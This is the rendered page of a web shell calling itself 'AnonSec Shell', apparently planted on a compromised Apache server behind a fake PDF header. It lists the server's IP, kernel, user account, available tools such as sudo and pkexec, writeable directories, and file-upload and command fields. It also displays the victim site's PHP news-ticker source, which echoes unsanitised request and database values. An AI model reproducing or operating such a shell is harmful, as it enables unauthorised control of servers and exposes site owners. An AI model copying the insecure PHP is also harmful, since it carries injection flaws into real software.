%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.216.219
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/public_html/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/meir5web/public_html/inc/10news_f_secure.php
<?php require_once('../Connections/french.php'); ?>
<?php
if (!function_exists("GetSQLValueString")) {
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") 
{
  $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;

  $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;    
    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? "'" . doubleval($theValue) . "'" : "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}

$maxRows_Recordset2 = 10;
$pageNum_Recordset2 = 0;
if (isset($_GET['pageNum_Recordset2'])) {
  $pageNum_Recordset2 = $_GET['pageNum_Recordset2'];
}
$startRow_Recordset2 = $pageNum_Recordset2 * $maxRows_Recordset2;

mysql_select_db($database_main, $main);
$query_Recordset2 = "SELECT id, header_f, `date`, show_f FROM news WHERE show_f = 1  ORDER BY `date` DESC";
$query_limit_Recordset2 = sprintf("%s LIMIT %d, %d", $query_Recordset2, $startRow_Recordset2, $maxRows_Recordset2);
$Recordset2 = mysql_query($query_limit_Recordset2, $main) or die(mysql_error());
$row_Recordset2 = mysql_fetch_assoc($Recordset2);

if (isset($_GET['totalRows_Recordset2'])) {
  $totalRows_Recordset2 = $_GET['totalRows_Recordset2'];
} else {
  $all_Recordset2 = mysql_query($query_Recordset2);
  $totalRows_Recordset2 = mysql_num_rows($all_Recordset2);
}
$totalPages_Recordset2 = ceil($totalRows_Recordset2/$maxRows_Recordset2)-1;
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
a {
	text-decoration: none;
}
-->
</style>
<link href="../style.css" rel="stylesheet" type="text/css" />
</head>

<body>
<table width="230" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td><table width="230" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td width="26" valign="top"><div align="left"><img src="../images/ball_blue.gif" width="20" height="20"></div></td>
        <td valign="top"><span class="headerblue"><strong>News</strong></span> </td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td valign="top" class="text"><div align="center">
    	  <table width="230" border="0" cellspacing="0" cellpadding="0">
            
<tr>
            <td colspan="2" valign="top"  ><marquee dir=ltr direction=up height=150 
      onMouseOut=this.scrollAmount=1; onMouseOver=this.scrollAmount=0; 
      scrollamount=1 scrolldelay=100 style="DIRECTION: ltr" width=220>
              <table width="100%" border="0" cellpadding="0" cellspacing="0">
              
                  <td valign="bottom"><?php do { ?>
                      <div align="left">
					  
					  <span class="date10News"><strong> <?php
$timestamp = strtotime($row_Recordset2['date']); //1072915200
echo date('M d', $timestamp);
?></strong></span> <span class="headergreen">&#8226;</span> <a href="http://www.meirpanim.fr/news_f.php?id=<?php echo $row_Recordset2['id']; ?>" target="_parent"><span class="text"><?php echo $row_Recordset2['header_f']; ?></span></a><br />
                      </div>
                  <?php } while ($row_Recordset2 = mysql_fetch_assoc($Recordset2)); ?></td>
                </tr>
              </table>
            </marquee></td>
          </tr>
          </table>
	  
      <br>
    </div></td>
  </tr>
</table>

</body>
</html>
<?php
mysql_free_result($Recordset2);
?>

Anon7 - 2022
AnonSec Team